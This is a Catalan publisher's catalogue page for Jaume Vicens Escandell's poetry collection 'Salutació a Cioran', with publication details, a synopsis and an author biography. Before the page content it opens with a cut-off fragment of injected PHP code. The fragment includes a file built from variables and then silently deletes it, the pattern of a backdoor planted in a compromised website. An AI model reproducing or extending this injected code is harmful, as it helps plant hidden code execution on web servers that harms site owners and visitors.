");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Salutació a Cioran
Cercador d'Obres
ORDENAR:
Començar recerca

Salutació a Cioran

Vicens Escandell, Jaume

Prologuista:
Amb il·lustracions de Gaspar Servera
Col·lecció:
Magatzem Can Toni
Tema:
Creació
Pàgines:
96
PVP:
12.00
ISBN:
978-84-15432-79-1
Data d'Edició:
28/03/2014
Un poemari provocador, el més madur i transcendent del poeta.


Sinopsi
Un Cioran pessimista essencial, destructor de totes les certeses i dibuixant infatigable i obsessiu de la vida com l’absurd perfecte. Un Cioran que defensava que «el fet que la vida no tengui cap sentit és una raó per a viure, l’única en realitat», l’home que confessava «haver comès tots els crims, excepte el de ser pare». Un Cioran que és font d’inspiració per a Jaume Vicens, que ens ofereix aquest poemari provocador, el més madur i transcendent del poeta.


Jaume Vicens Escandell
(Palma, 1956), és un jubilat per Mallorca i membre de la junta directiva de l’associació Jubilats per Mallorca. Ha publicat tres llibres de poemes: Dècada primera, Poemes negres, Propagació de l’estiu, Salutació a Cioran i Cròniques de la guerra. Ha guanyat el premi de poesia Vall d’Or, convocat per l’Ajuntament de Sóller i el premi de poesia Castellitx, convocat per l’Ajuntament d’Algaida. També ha publicat narrativa en la revista valenciana L’Aljamia i ha col·laborat amb la revista de divulgació cultural S’Esclop. En 2009 i 2010 va ser el coordinador del butlletí informatiu L’Estaló, editat a Calvià, i ha col·laborat en diverses publicacions, tant d’aquest municipi com en altres revistes editades per l’Associació de la Premsa Forana de Mallorca.
Recomanar
Comentar
Comentaris (0)